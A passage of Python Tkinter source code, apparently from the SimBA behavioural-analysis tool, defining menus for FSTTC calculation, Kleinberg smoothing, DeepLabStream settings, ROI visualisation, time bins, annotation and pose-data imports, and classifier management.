carry_classifier_name.grid(row=12,sticky=W)
approach_classifier_name.grid(row=13,sticky=W)
dig_classifier_name.grid(row=14, sticky=W)
button_run.grid(row=1,padx=10,pady=10)
def fsttcmenu(self):
#get data
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# get current no of target
notarget = config.getint('SML settings', 'no_targets')
targetlist = [0] * notarget
varlist = [0] * notarget
for i in range(notarget):
varlist[i] = IntVar()
targetlist[i] = (config.get('SML settings', 'target_name_' + str(i + 1)))
#toplvl
fstoplvl = Toplevel()
fstoplvl.minsize(400,320)
fstoplvl.wm_title('Calculate forward-spike time tiling coefficents')
#git
lbl_git_fsttc = Label(fstoplvl, text='[Click here to learn about FSTTC]',cursor='hand2', fg='blue')
lbl_git_fsttc.bind('<Button-1>', lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/FSTTC.md'))
#fsttc settings
lbl_fsttc_settings = LabelFrame(fstoplvl,text='FSTTC Settings', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
cvar = IntVar()
cr8_graph = Checkbutton(lbl_fsttc_settings,text='Create graph',variable=cvar)
time_delta = Entry_Box(lbl_fsttc_settings,'Time Delta','10')
lbl_behavior = LabelFrame(lbl_fsttc_settings,text="Behaviors")
#behaviors
behaviorlist = [0]*notarget
for i in range(len(targetlist)):
behaviorlist[i] = Checkbutton(lbl_behavior,text=str(targetlist[i]),variable=varlist[i])
behaviorlist[i].grid(row=str(i),sticky=W)
ftsccbutton = Button(fstoplvl,text='Calculate FSTTC',command=lambda:self.runfsttc(time_delta.entry_get,cvar.get(),targetlist,varlist))
#organize
lbl_git_fsttc.grid(row=0,sticky=W,pady=5)
lbl_fsttc_settings.grid(row=1,sticky=W)
cr8_graph.grid(row=0,sticky=W)
time_delta.grid(row=1,sticky=W,pady=5)
lbl_behavior.grid(row=2,sticky=W,pady=5)
ftsccbutton.grid(row=3,pady=10)
def runfsttc(self,timedelta,creategraph,targetlist,varlist):
if creategraph == 1:
creategraph = True
else:
creategraph = False
target = []
for i in range(len(varlist)):
if varlist[i].get()==1:
target.append(targetlist[i])
FSTCC_performer = FSTCC_perform(self.projectconfigini, timedelta, target, creategraph)
FSTCC_performer.calculate_sequence_data()
FSTCC_performer.calculate_FSTCC()
FSTCC_performer.save_results()
FSTCC_performer.plot_results()
def kleinbergMenu(self):
kleintoplvl = Toplevel()
kleintoplvl.minsize(400,320)
kleintoplvl.wm_title('Apply Kleinberg behavior classification smoothing')
#git
label_git_kleinberg = Label(kleintoplvl, text='[Click here to learn about Kleinberg Smoother]',cursor='hand2', fg='blue')
label_git_kleinberg.bind('<Button-1>', lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/kleinberg_filter.md'))
#kleinberg settings
lbl_kleinberg_settings = LabelFrame(kleintoplvl,text='Kleinberg Settings', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.k_sigma = Entry_Box(lbl_kleinberg_settings,'Sigma','10')
self.k_sigma.entry_set('2')
self.k_gamma = Entry_Box(lbl_kleinberg_settings,'Gamma','10')
self.k_gamma.entry_set('0.3')
self.k_hierarchy = Entry_Box(lbl_kleinberg_settings,'Hierarchy','10')
self.k_hierarchy.entry_set('1')
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# get current no of target
notarget = config.getint('SML settings', 'no_targets')
targetlist = [0]*notarget
varlist = [0]*notarget
for i in range(notarget):
varlist[i] = IntVar()
targetlist[i] = (config.get('SML settings', 'target_name_' + str(i + 1)))
#make table for classifier to apply filter
tablelabel = LabelFrame(kleintoplvl,text='Choose classifier(s) to apply Kleinberg smoothing')
for i in range(notarget):
Checkbutton(tablelabel, text=str(targetlist[i]), variable=varlist[i]).grid(row=i, sticky=W)
run_kleinberg_button = Button(kleintoplvl,text='Apply Kleinberg Smoother',command= lambda: self.runkleinberg(targetlist,varlist))
#organize
label_git_kleinberg.grid(row=0,sticky=W)
lbl_kleinberg_settings.grid(row=1,sticky=W,padx=10)
self.k_sigma.grid(row=0,sticky=W)
self.k_gamma.grid(row=1,sticky=W)
self.k_hierarchy.grid(row=2,sticky=W)
tablelabel.grid(row=2,pady=10,padx=10)
run_kleinberg_button.grid(row=3)
def runkleinberg(self,targetlist,varlist):
classifier_list =[]
for i in range(len(varlist)):
if varlist[i].get() == 1:
classifier_list.append(targetlist[i])
print(classifier_list,'selected')
run_kleinberg(self.projectconfigini,classifier_list,self.k_sigma.entry_get,self.k_gamma.entry_get,self.k_hierarchy.entry_get)
print('Kleinberg filter applied, process completed.')
def DLSsettings(self):
config = ConfigParser()
configFile = os.path.join(str(self.label_settingsini.folder_path),'settings.ini')
config.read(configFile)
# get current settings
#streaming
resolution = config.get('Streaming', 'RESOLUTION')
framerate = config.get('Streaming', 'FRAMERATE')
streams = config.get('Streaming','STREAMS')
outputdir = config.get('Streaming','OUTPUT_DIRECTORY')
multi_devices = config.get('Streaming','MULTIPLE_DEVICES')
video_source = config.get('Streaming','VIDEO_SOURCE')
video_path = config.get('Streaming','VIDEO_PATH')
video = config.get('Streaming','VIDEO')
animal_no = config.get('Streaming','ANIMALS_NUMBER')
port = config.get('Streaming','PORT')
ipwebcam = config.get('Streaming','IPWEBCAM')
#deeplabcut
dlcpath = config.get('DeepLabCut','DLC_PATH')
model = config.get('DeepLabCut','MODEL')
#classification
classifier_path = config.get('Classification','PATH_TO_CLASSIFIER')
allbp = config.get('Classification','ALL_BODYPARTS')
ppm = config.get('Classification','PIXPERMM')
threshold = config.get('Classification','THRESHOLD')
poolsize = config.get('Classification','POOL_SIZE')
#experiment
exp_no = config.get('Experiment','EXP_NUMBER')
record_exp = config.get('Experiment','RECORD_EXP')
#deeplabstream
dls_path = config.get('DeepLabStream','DLS_PATH')
#top level design
dlstoplevel = Toplevel()
dlstoplevel.minsize(300, 400)
dlstoplevel.wm_title('DeepLabStream Settings')
#streaming
labelStreamimg = LabelFrame(dlstoplevel,text='Streaming', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_reso = Entry_Box(labelStreamimg,'Resolution','15')
self.e_fps = Entry_Box(labelStreamimg,'Frame rate','15')
self.e_streams = Entry_Box(labelStreamimg, 'Streams', '15')
self.e_outputdir = FolderSelect(labelStreamimg,'Output directory',title='Select output directory',lblwidth='15')
self.e_multiDevice = Entry_Box(labelStreamimg, 'Multiple devices', '15')
self.e_videosource = Entry_Box(labelStreamimg, 'Video source', '15')
self.e_videopath = FileSelect(labelStreamimg,'Video path',title='Select video',lblwidth='15')
self.e_video = Entry_Box(labelStreamimg, 'Video', '15')
self.e_animalNo = Entry_Box(labelStreamimg, 'Animals #', '15')
self.e_port = Entry_Box(labelStreamimg, 'Port', '15')
self.e_ipwebcam = Entry_Box(labelStreamimg, 'IP webcam', '15')
#deeplabcut
label_dlc = LabelFrame(dlstoplevel,text='DeepLabCut', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_dlcpath = FolderSelect(label_dlc,'DLC path',title='Select deeplabcut package in python site packages',lblwidth='15')
self.e_model = FolderSelect(label_dlc,'Model folder path',title='Select DeepLabCut tracking model folder path',lblwidth='15')
#classification
label_classification = LabelFrame(dlstoplevel,text='Classification', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_classifierpath = FileSelect(label_classification,'Classifier path',title='Select Simba Classifier (.sav) file',lblwidth='15')
self.e_allBP = Entry_Box(label_classification,'All bodyparts',labelwidth='15')
self.e_ppm = Entry_Box(label_classification,'Pixel / mm','15')
self.e_threshold = Entry_Box(label_classification,'Threshold','15')
self.e_poolsize = Entry_Box(label_classification,'Pool size','15')
#experiment
label_exp = LabelFrame(dlstoplevel,text='Experiment', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_expNo = Entry_Box(label_exp,'Experiment #','15')
self.e_recordExp = Entry_Box(label_exp,'Record Experiment','15')
# deeplabstream
label_dls = LabelFrame(dlstoplevel,text='DeepLabStream', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.e_dls_path = FolderSelect(label_dls,'DLS path',title='Please select DeepLabStream folder in python packages')
#feed in config parser
#streaming
self.e_reso.entPath.insert(0,resolution)
self.e_fps.entPath.insert(0,framerate)
self.e_streams.entPath.insert(0,streams)
self.e_outputdir.folderPath.set(outputdir)
self.e_multiDevice.entPath.insert(0,multi_devices)
self.e_videosource.entPath.insert(0,video_source)
self.e_videopath.filePath.set(video_path)
self.e_video.entPath.insert(0,video)
self.e_animalNo.entPath.insert(0,animal_no)
self.e_port.entPath.insert(0,port)
self.e_ipwebcam.entPath.insert(0,ipwebcam)
#deeplabcut
self.e_dlcpath.folderPath.set(dlcpath)
self.e_model.folderPath.set(model)
#classification
self.e_classifierpath.filePath.set(classifier_path)
self.e_allBP.entPath.insert(0,allbp)
self.e_ppm.entPath.insert(0,ppm)
self.e_threshold.entPath.insert(0,threshold)
self.e_poolsize.entPath.insert(0,poolsize)
#experiment
self.e_expNo.entPath.insert(0,exp_no)
self.e_recordExp.entPath.insert(0,record_exp)
#dls
self.e_dls_path.folderPath.set(dls_path)
#organize
#streaming
labelStreamimg.grid(row=0,sticky=W)
self.e_reso.grid(row=0,sticky=W)
self.e_fps.grid(row=1,sticky=W)
self.e_streams.grid(row=2,sticky=W)
self.e_outputdir.grid(row=3,sticky=W)
self.e_multiDevice.grid(row=4,sticky=W)
self.e_videosource.grid(row=5,sticky=W)
self.e_videopath.grid(row=6,sticky=W)
self.e_video.grid(row=7,sticky=W)
self.e_animalNo.grid(row=8,sticky=W)
self.e_port.grid(row=9,sticky=W)
self.e_ipwebcam.grid(row=10,sticky=W)
#deeplabcut
label_dlc.grid(row=1,sticky=W)
self.e_dlcpath.grid(row=0,sticky=W)
self.e_model.grid(row=1,sticky=W)
#classification
label_classification.grid(row=2,sticky=W)
self.e_classifierpath.grid(row=0,sticky=W)
self.e_allBP.grid(row=1,sticky=W)
self.e_ppm.grid(row=2,sticky=W)
self.e_threshold.grid(row=3,sticky=W)
self.e_poolsize.grid(row=4,sticky=W)
#experiment
label_exp.grid(row=3,sticky=W)
self.e_expNo.grid(row=0,sticky=W)
self.e_recordExp.grid(row=1,sticky=W)
#dls
label_dls.grid(row=4,sticky=W)
self.e_dls_path.grid(row=0,sticky=W)
#confirm button
button = Button(dlstoplevel,text='Save settings',command=self.saveDLSsettings)
button.grid(row=5,pady=10,padx=10)
#run dls
button2 = Button(dlstoplevel,text='Run DeepLabStream',command=lambda: threading.Thread(target=self.rundls).start())
button2.grid(row=6,pady=10,padx=10)
def rundls(self):
path = str(os.path.join(self.e_dls_path.folder_path,'app.py'))
print(path)
call(['python',path])
def saveDLSsettings(self):
config = ConfigParser()
configFile = os.path.join(str(self.label_settingsini.folder_path),'settings.ini')
config.read(configFile)
# write the new values into ini file
config.set('Streaming', 'RESOLUTION', str(self.e_reso.entry_get))
config.set('Streaming', 'FRAMERATE', str(self.e_fps.entry_get))
config.set('Streaming', 'STREAMS', str(self.e_streams.entry_get))
config.set('Streaming', 'OUTPUT_DIRECTORY', str(self.e_outputdir.folder_path))
config.set('Streaming', 'MULTIPLE_DEVICES', str(self.e_multiDevice.entry_get))
config.set('Streaming', 'VIDEO_SOURCE', str(self.e_videosource.entry_get))
config.set('Streaming', 'VIDEO_PATH', str(self.e_videopath.file_path))
config.set('Streaming', 'VIDEO', str(self.e_video.entry_get))
config.set('Streaming', 'ANIMALS_NUMBER', str(self.e_animalNo.entry_get))
config.set('Streaming', 'PORT', str(self.e_port.entry_get))
config.set('Streaming', 'IPWEBCAM', str(self.e_ipwebcam.entry_get))
config.set('DeepLabCut', 'DLC_PATH', str(self.e_dlcpath.folder_path))
config.set('DeepLabCut', 'MODEL', str(self.e_model.folder_path))
config.set('Classification', 'PATH_TO_CLASSIFIER', str(self.e_classifierpath.file_path))
config.set('Classification', 'ALL_BODYPARTS', str(self.e_allBP.entry_get))
config.set('Classification', 'PIXPERMM', str(self.e_ppm.entry_get))
config.set('Classification', 'THRESHOLD', str(self.e_threshold.entry_get))
config.set('Classification', 'POOL_SIZE', str(self.e_poolsize.entry_get))
config.set('Experiment', 'EXP_NUMBER', str(self.e_expNo.entry_get))
config.set('Experiment', 'RECORD_EXP', str(self.e_recordExp.entry_get))
config.set('DeepLabStream','dls_path', str(self.e_dls_path.folder_path))
with open(os.path.join(str(self.label_settingsini.folder_path),'settings.ini'), 'w') as configfile:
config.write(configfile)
print('Settings saved in',os.path.basename(configFile))
def quicklineplot(self):
lptoplevel = Toplevel()
lptoplevel.minsize(300,200)
lptoplevel.wm_title('Plot path plot')
videodir = os.path.join(os.path.dirname(self.projectconfigini),'videos')
vid_list = os.listdir(videodir)
bpdir = os.path.join(os.path.dirname(self.projectconfigini),'logs','measures','pose_configs','bp_names','project_bp_names.csv')
bplist = pd.read_csv(bpdir,header=None)[0].to_list()
lplabelframe = LabelFrame(lptoplevel)
videoSelected = DropDownMenu(lplabelframe, 'Video', vid_list, '15')
videoSelected.setChoices(vid_list[0])
bpSelected = DropDownMenu(lplabelframe, 'Body part', bplist, '15')
bpSelected.setChoices(bplist[0])
lpbutton = Button(lplabelframe,text='Generate path plot',command= lambda:draw_line_plot(self.projectconfigini,videoSelected.getChoices(),bpSelected.getChoices()))
#organize
lplabelframe.grid(row=0,sticky=W)
videoSelected.grid(row=1, sticky=W)
bpSelected.grid(row=2, sticky=W)
lpbutton.grid(row=3, pady=12)
def visualizeRoiTracking(self):
vrtoplevel = Toplevel()
vrtoplevel.minsize(350, 300)
vrtoplevel.wm_title('Visualize ROI tracking')
videodir = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
vid_list = os.listdir(videodir)
vrlabelframe = LabelFrame(vrtoplevel,text='Visualize ROI tracking on single video',pady=10,padx=10,font=("Helvetica",12,'bold'),fg='black')
videoSelected = DropDownMenu(vrlabelframe, 'Select video', vid_list, '15')
videoSelected.setChoices(vid_list[0])
vrbutton = Button(vrlabelframe, text='Generate ROI visualization', command=lambda: self.roiPlot_singlevideo(videoSelected.getChoices()))
#multi
multilabelframe = LabelFrame(vrtoplevel,text='Visualize ROI tracking on all videos',pady=10,padx=10,font=("Helvetica",12,'bold'),fg='black')
multiButton = Button(multilabelframe,text='Generate ROI visualization on all videos',command = self.roiPlot_allvideos)
#threshold
self.p_threshold = Entry_Box(vrtoplevel,'Bp probability threshold','20')
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
#set threshdhol if exist
try:
thres = config.get('ROI settings', 'probability_threshold')
self.p_threshold.entry_set(thres)
except:
self.p_threshold.entry_set(0.0)
thresholdlabel = Label(vrtoplevel,text='Note: body-part locations detected with probabilities below this threshold will be filtered out.')
# organize
vrlabelframe.grid(row=0, sticky=W)
videoSelected.grid(row=1, sticky=W)
vrbutton.grid(row=2, pady=12)
multilabelframe.grid(row=1,sticky=W,pady=10)
multiButton.grid(row=0,sticky=W)
self.p_threshold.grid(row=2,sticky=W,pady=10)
thresholdlabel.grid(row=3,sticky=W,pady=10)
def roiPlot_singlevideo(self,video):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold', str(self.p_threshold.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
roiPlot(self.projectconfigini,video)
def roiPlot_allvideos(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold',str(self.p_threshold.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
videolist = os.listdir(os.path.join(os.path.dirname(self.projectconfigini),'videos'))
for i in videolist:
roiPlot(self.projectconfigini,i)
def visualizeROifeatures(self):
vrfeattoplevel = Toplevel()
vrfeattoplevel.minsize(350, 300)
vrfeattoplevel.wm_title('Visualize ROI features')
videodir = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
vid_list = os.listdir(videodir)
vrlabelframe = LabelFrame(vrfeattoplevel, text='Visualize ROI features on single video', pady=10, padx=10,
font=("Helvetica", 12, 'bold'), fg='black')
videoSelected = DropDownMenu(vrlabelframe, 'Select video', vid_list, '15')
videoSelected.setChoices(vid_list[0])
vrbutton = Button(vrlabelframe, text='Generate ROI visualization', command=lambda: self.roifeatures_singlevid(videoSelected.getChoices()))
# multi
multifealabelframe = LabelFrame(vrfeattoplevel, text='Visualize ROI features on all videos', pady=10, padx=10,
font=("Helvetica", 12, 'bold'), fg='black')
multifeaButton = Button(multifealabelframe, text='Generate ROI visualization on all videos',
command=self.roifeatures_allvid)
# threshold
self.p_threshold_b = Entry_Box(vrfeattoplevel, 'Bp probability threshold', '20')
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# set threshdhol if exist
try:
thres = config.get('ROI settings', 'probability_threshold')
self.p_threshold_b.entry_set(thres)
except:
self.p_threshold_b.entry_set(0.0)
thresholdlabel = Label(vrfeattoplevel,
text='Note: body-part locations detected with probabilities below this threshold will be filtered out.')
# organize
vrlabelframe.grid(row=0, sticky=W)
videoSelected.grid(row=1, sticky=W)
vrbutton.grid(row=2, pady=12)
multifealabelframe.grid(row=1,sticky=W,pady=10)
multifeaButton.grid(row=0,sticky=W)
self.p_threshold_b.grid(row=3,sticky=W,pady=10)
thresholdlabel.grid(row=4,sticky=W,pady=10)
def roifeatures_singlevid(self,video):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold', str(self.p_threshold_b.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
ROItoFeaturesViz(self.projectconfigini, video)
def roifeatures_allvid(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
# write the new values into ini file
config.set('ROI settings', 'probability_threshold', str(self.p_threshold_b.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
videolist = os.listdir(os.path.join(os.path.dirname(self.projectconfigini),'videos'))
for i in videolist:
ROItoFeaturesViz(self.projectconfigini,i)
def timebinmove(self,var):
timebintoplevel = Toplevel()
timebintoplevel.minsize(200, 80)
timebintoplevel.wm_title("Time bins settings")
tb_labelframe = LabelFrame(timebintoplevel)
tb_entry = Entry_Box(tb_labelframe,'Set time bin size (s)','15')
if var == 'mov':
tb_button = Button(tb_labelframe,text='Run',command=lambda:time_bins_movement(self.projectconfigini,int(tb_entry.entry_get)))
else:
tb_button = Button(tb_labelframe, text='Run',
command=lambda: time_bins_classifier(self.projectconfigini, int(tb_entry.entry_get)))
##organize
tb_labelframe.grid(row=0,sticky=W)
tb_entry.grid(row=1,sticky=W)
tb_button.grid(row=2,pady=10)
def importBoris(self):
ann_folder = askdirectory()
append_Boris_annot(self.projectconfigini,ann_folder)
def importSolomon(self):
ann_folder = askdirectory()
solomonToSimba(self.projectconfigini,ann_folder)
def importMARS(self):
ann_folder = askdirectory()
append_dot_ANNOTT(self.projectconfigini, ann_folder)
def fileselected(self,val):
try:
self.frame.destroy()
except:
pass
self.frame = Frame(self.label_import_csv)
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
no_animals_int = config.getint('General settings', 'animal_no')
try:
self.animal_ID_list = config.get('Multi animal IDs', 'id_list').split(',')
except MissingSectionHeaderError:
self.animal_ID_list = []
for animal in range(no_animals_int): animal_ID_list.append('Animal_' + str(animal + 1))
if val == 'CSV (DLC/DeepPoseKit)':
# multicsv
label_multicsvimport = LabelFrame(self.frame, text='Import multiple csv files', pady=5, padx=5)
self.folder_csv = FolderSelect(label_multicsvimport, 'Folder selected:', title='Select Folder with .csv(s)')
button_import_csv = Button(label_multicsvimport, text='Import csv to project folder',
command=self.importdlctracking_multi, fg='navy')
# singlecsv
label_singlecsvimport = LabelFrame(self.frame, text='Import single csv files', pady=5, padx=5)
self.file_csv = FileSelect(label_singlecsvimport, 'File selected', title='Select a .csv file')
button_importsinglecsv = Button(label_singlecsvimport, text='Import single csv to project folder',
command=self.importdlctracking_single, fg='navy')
self.frame.grid(row=1, sticky=W)
label_multicsvimport.grid(row=1, sticky=W)
self.folder_csv.grid(row=0, sticky=W)
button_import_csv.grid(row=1, sticky=W)
label_singlecsvimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglecsv.grid(row=1, sticky=W)
elif val =='JSON (BENTO)':
# import json into projectfolder
# multijson
label_multijsonimport = LabelFrame(self.frame, text='Import multiple json files', pady=5,
padx=5)
self.folder_json = FolderSelect(label_multijsonimport, 'Folder Select:',
title='Select Folder with .json(s)')
button_import_json = Button(label_multijsonimport, text='Import json to project folder',
command=lambda: json2csv_folder(self.projectconfigini,
self.folder_json.folder_path), fg='navy')
# singlejson
label_singlejsonimport = LabelFrame(self.frame, text='Import single json file', pady=5, padx=5)
self.file_csv = FileSelect(label_singlejsonimport, 'File Select', title='Select a .csv file')
button_importsinglejson = Button(label_singlejsonimport, text='Import single .json to project folder',
command=lambda: json2csv_file(self.projectconfigini,
self.file_csv.file_path), fg='navy')
# import json into projectfolder
self.frame.grid(row=1, sticky=W)
label_multijsonimport.grid(row=1, sticky=W)
self.folder_json.grid(row=0, sticky=W)
button_import_json.grid(row=1, sticky=W)
label_singlejsonimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglejson.grid(row=1, sticky=W)
elif val in ('SLP (SLEAP)','H5 (multi-animal DLC)'):
animalsettings = LabelFrame(self.frame, text='Animal settings', pady=5, padx=5)
noofanimals = Entry_Box(animalsettings, 'No of animals', '15')
noofanimals.entry_set(no_animals_int)
animalnamebutton = Button(animalsettings, text='Confirm', command=lambda: self.animalnames(noofanimals.entry_get, animalsettings))
if val == 'H5 (multi-animal DLC)':
options = ['skeleton', 'box','ellipse']
self.dropdowndlc = DropDownMenu(self.frame, 'Tracking type', options, '15')
self.dropdowndlc.setChoices(options[1])
self.h5path = FolderSelect(self.frame, 'Path to h5 files', lblwidth=15)
labelinstruction = Label(self.frame,
text='Please import videos before importing the \n'
' multi animal DLC tracking data')
runsettings = Button(self.frame, text='Import h5', command=self.importh5)
#organize
self.dropdowndlc.grid(row=2, sticky=W)
else:
self.h5path = FolderSelect(self.frame, 'Path to .slp files', lblwidth=15)
labelinstruction = Label(self.frame,
text='Please import videos before importing the \n'
' multi animal SLEAP tracking data')
runsettings = Button(self.frame, text='Import .slp', command=self.importh5)
# organize
self.frame.grid(row=1, sticky=W)
animalsettings.grid(row=1, sticky=W)
noofanimals.grid(row=0, sticky=W)
animalnamebutton.grid(row=0, column=1, sticky=W)
#save val into memory for dlc or sleap
self.val = val
self.h5path.grid(row=3, sticky=W)
labelinstruction.grid(row=4, pady=10, sticky=W)
runsettings.grid(row=5, pady=10)
def importh5(self):
idlist = []
try:
for i in self.animalnamelist:
idlist.append(i.entry_get)
if self.val =='H5 (multi-animal DLC)':
importMultiDLCpose(self.projectconfigini, self.h5path.folder_path, self.dropdowndlc.getChoices(), idlist)
else:
importSLEAPbottomUP(self.projectconfigini,self.h5path.folder_path,idlist)
except Exception as error_str:
print(error_str)
print('Check that you have confirmed the number of animals and named your animals in the SimBA interface')
def animalnames(self, noofanimal, master):
try:
self.frame2.destroy()
except:
pass
no_animal = int(noofanimal)
self.animalnamelist = [0] * no_animal
self.frame2 = Frame(master)
self.frame2.grid(row=1, sticky=W)
for i in range(no_animal):
self.animalnamelist[i] = Entry_Box(self.frame2, 'Animal ' + str(i + 1) + ' name', '15')
self.animalnamelist[i].grid(row=i, sticky=W)
self.animalnamelist[i].entry_set(self.animal_ID_list[i])
def addclassifier(self,newclassifier):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
#get current no of target
notarget = config.getint('SML settings', 'no_targets')
## increase the size of the latest no of target and create a new modelpath and target name
notarget+=1
modelpath = 'model_path_' + str(notarget)
targetname = 'target_name_' + str(notarget)
#write the new values into ini file
config.set('SML settings', modelpath, '')
config.set('SML settings', targetname, str(newclassifier))
config.set('SML settings', 'no_targets', str(notarget))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
print(str(newclassifier),'added.')
def removeclassifiermenu(self):
rcMenu = Toplevel()
rcMenu.minsize(200, 200)
rcMenu.wm_title("Warning: Remove classifier(s) settings")
# get target
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
notarget = config.getint('SML settings', 'no_targets')
targetlist = []
for i in range(notarget):
targetlist.append(config.get('SML settings', 'target_name_' + str(i + 1)))
labelcr = LabelFrame(rcMenu,text='Select a classifier to remove')
classifiertoremove = DropDownMenu(labelcr,'Classifier',targetlist,'8')
classifiertoremove.setChoices(targetlist[0])
button = Button(labelcr,text='Remove classifier',command=lambda:self.removeclassifier(classifiertoremove.getChoices(),targetlist))
#organize
labelcr.grid(row=0,sticky=W)
classifiertoremove.grid(row=0,sticky=W)
button.grid(row=1,pady=10)
def removeclassifier(self,choice,targetlist):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
## try to remove the selected classifier
try:
targetlist.remove(choice)
print(str(choice), 'is removed.')
except ValueError:
print(choice,'no longer exist in the project_config.ini')
config.remove_option('SML settings','no_targets')
for i in range(len(targetlist)+1):
config.remove_option('SML settings','model_path_'+str(i+1))
config.remove_option('SML settings', 'target_name_' + str(i + 1))
config.set('SML settings', 'no_targets', str(len(targetlist)))
for i in range(len(targetlist)):
config.set('SML settings','model_path_'+str(i+1),'')
config.set('SML settings','target_name_'+str(i+1),str(targetlist[i]))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
def tracknoofanimal(self,master,bplist):
try:
self.Bodyparts1.destroy()
except:
pass
try:
self.Bodyparts2.destroy()
except:
pass
if self.noofAnimal.getChoices()=='1':
self.Bodyparts1 = DropDownMenu(master, 'Animal 1 bodypart', bplist, '15')
self.Bodyparts1.setChoices((bplist)[0])
self.Bodyparts1.grid(row=4,sticky=W)
self.Bodyparts2 = DropDownMenu(master, 'Animal 2 bodypart', bplist, '15')
self.Bodyparts2.setChoices(None)
elif self.noofAnimal.getChoices() == '2':
self.Bodyparts1 = DropDownMenu(master, 'Animal 1 bodypart', bplist, '15')
self.Bodyparts1.setChoices((bplist)[0])
self.Bodyparts1.grid(row=4, sticky=W)
self.Bodyparts2 = DropDownMenu(master, 'Animal 2 bodypart', bplist, '15')
self.Bodyparts2.setChoices((bplist)[len(bplist) // 2])
self.Bodyparts2.grid(row=5, sticky=W)
def loaddefinedroi(self):
h5dir = os.path.join(os.path.dirname(self.projectconfigini), 'logs', 'measures')
h5list = os.listdir(h5dir)
result = [i for i in h5list if '.h5' in i]
if result == []:
print('Please define ROI Shapes')
else:
videodir = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
roitableMenu(videodir, self.projectconfigini)
def appendroisettings(self):
apdroisettings = Toplevel()
apdroisettings.minsize(400, 400)
apdroisettings.wm_title("Append Roi Settings")
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
projectNoAnimals = config.getint('General settings', 'animal_no')
# first choice frame
firstMenu = LabelFrame(apdroisettings, text='Select number of animals')
## set up drop down for animals
noOfAnimalVar = IntVar()
animalOptions = set(range(1, projectNoAnimals + 1))
noOfAnimalVar.set(1)
animalMenu = OptionMenu(firstMenu, noOfAnimalVar, *animalOptions)
animalLabel = Label(firstMenu, text="# of animals")
setAnimalButton = Button(firstMenu, text="Confirm",
command=lambda: self.run_roiAnalysisSettings(apdroisettings, noOfAnimalVar,'append'))
# organize
firstMenu.grid(row=0, sticky=W)
animalLabel.grid(row=0, column=0, sticky=W)
animalMenu.grid(row=0, column=1, sticky=W)
setAnimalButton.grid(row=0, column=2, sticky=W)
def timebin_ml(self,title,text='Run'):
roisettings = Toplevel()
roisettings.minsize(400, 400)
roisettings.wm_title(title)
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
projectNoAnimals = config.getint('General settings', 'animal_no')
#first choice frame
firstMenu = LabelFrame(roisettings,text='Select number of animals')
## set up drop down for animals
noOfAnimalVar = IntVar()
animalOptions = set(range(1, projectNoAnimals+1))
noOfAnimalVar.set(1)
animalMenu = OptionMenu(firstMenu,noOfAnimalVar,*animalOptions)
animalLabel = Label(firstMenu,text="# of animals")
setAnimalButton = Button(firstMenu,text="Confirm",command=lambda:self.timebin_ml2(roisettings,noOfAnimalVar,text=text))
#organize
firstMenu.grid(row=0,sticky=W)
animalLabel.grid(row=0,column=0,sticky=W)
animalMenu.grid(row=0,column=1,sticky=W)
setAnimalButton.grid(row=0,column=2,sticky=W)
def timebin_ml2(self, master, noofanimal, text='Run'):
try:
self.secondMenu.destroy()
except:
pass
self.secondMenu = LabelFrame(master, text="Choose bodyparts")
# try to see if it exist or not
configini = self.projectconfigini
config = ConfigParser()
config.read(configini)
runButton = Button(self.secondMenu, text=text,
command=lambda: self.timebin_ml3(noofanimal.get(),self.animalVarList[animal].get(),self.binlen.entry_get))
animals2analyze = noofanimal.get()
labelFrameList, labelList, self.animalVarList, AnimalStringVarList, optionsVarList, animalBodyMenuList = [], [], [], [], [], []
options = define_bp_drop_down(configini)
for animal in range(animals2analyze):
animalName = str(animal + 1)
labelFrameList.append(LabelFrame(self.secondMenu, text='Animal ' + animalName))
labelList.append(Label(labelFrameList[animal], text='Bodypart'))
self.animalVarList.append(StringVar())
self.animalVarList[animal].set(options[animal][0])
animalBodyMenuList.append(OptionMenu(labelFrameList[animal], self.animalVarList[animal], *options[animal]))
#binlen
self.binlen = Entry_Box(self.secondMenu,'Set time bin size (s)',"16")
# organize
self.secondMenu.grid(row=1, sticky=W)
for animal in range(animals2analyze):
labelFrameList[animal].grid(row=animal, column=0, sticky=W)
labelList[animal].grid(row=0, column=0, sticky=W)
animalBodyMenuList[animal].grid(row=animal, column=0, sticky=W)
